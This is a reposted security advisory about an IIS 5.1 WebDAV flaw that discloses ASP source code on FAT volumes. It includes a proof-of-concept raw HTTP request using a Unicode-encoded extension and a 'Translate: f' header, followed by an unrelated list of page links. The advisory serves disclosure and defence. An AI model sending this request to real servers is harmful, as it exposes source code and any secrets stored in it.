IIS 5.1 allows for remote viewing of source code..
来源:互联网 发布:淘宝助理 编辑:程序博客网 时间:2024/05/22 10:49
Origin: http://www.fr33d0m.net/content-2947.html
It is possible to remotely view the source code of web script files though a specially crafted WebDAV HTTP request. Only IIS 5.1 seems to be vulnerable. The web script file must be on a FAT or a FAT32 volume, web scripts located on NTFS volumes are not vulnerable.
Confirmed vulnerable
-Mcft® Internet Information Server® V5.1:
a. Mcft® windows® XP Pro. with SP2(English)
b. Mcft® windows® XP Pro. with SP2(Norwegian)
c. Mcft® windows® XP Pro. with SP1(Swedish)
Confimed not vulnerable
-Mcft® Internet Information Server® V5.0:
a. Mcft® windows® 2000 Server with SP4(English)
-Mcft® Internet Information Server® V6.0:
a. Mcft® windows® 2003 Standard(English)
Vendor status
Notified
Solution
Don't use FAT or FAT32 with IIS 5.1
Techical description
WebDAV allows for retrieving streams using the "Translate: f" HTTP header, the processing of this header has logic built into it so that web script files are not processed, this logic can be avoided by using Unicode characters instead in one of the letters of the file.The file must be on a FAT or FAT32 volume to be viewed, a NTFS volume will return a"Forbidden" HTTP response instead.
Proof of Concept:
I have used the server "www.server.net" here, replace with your own server name.
1. Format a volume as FAT or FAT32, or use an existing one
2. Create a folder called "www"
3. Add a new ASP file called "test.asp" in "www"
4. Add this code line "<%=Response.write("Hello World"%>" in "test.asp"
5. Create a new virtual folder in IIS 5.1 and map it agains the folder you made in step 2
6. Open a browser and navigate to "http://www.server.net/www/test.asp" and confirm
that the text "Hello world" is returned and not the script code.
7. Open a MSDOS console
8. Type "telnet www.server.net 80" and hit ENTER
9. Paste the following text block or type it manually:
GET /www/test.as%CF%80 HTTP/1.1
Translate: f
Host: www.server.net
Connection: Close
10. Hit ENTER twize to signal end of HTTP request
11. You should see "<%=Response.write("Hello World"%>" beeing returned
Thanks,
- IIS 5.1 allows for remote viewing of source code..
- nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
- Vulnerability in Graphics Rendering Engine Allows Remote Code Execution
- Viewing the Message Source / Full Headers of an Email
- Source Code of exe2com.
- Source Code of exe2com
- Source code of CIH
- Study of Source code
- Source code of ZMRP_VSS_CLEANUP
- source code of CV
- Installing MDX on ubuntu for viewing results of roi_pac
- Open Source Software for Remote Sensing
- Use of Legacy Source Code
- source code of MES Data
- Source Code of Java - String
- Source Code of Java - StringBuffer
- Source Code of Java - Boolean
- Source Code of Java - Integer
- BCB中Byte[]类型转换成AnsiSring类型数据的一个函数
- 了解我的价值观,分享我的体验
- try
- Flash Action Script总结【非此即彼问题】
- “扁马会”三对三名单终确定
- IIS 5.1 allows for remote viewing of source code..
- IT新名词:RiA —— Rich Internet Application(C/B/S架构)
- 介绍一个Eclipse的打包插件-Fatjar
- 托盘程序演练
- 介绍一些在网络编程中常用的工具方法
- 给WINDOWS服务加上描述
- Peercast电台收听XML记录
- oracle存储参数(storage子句)含义及设置技巧
- WINDOWS快捷键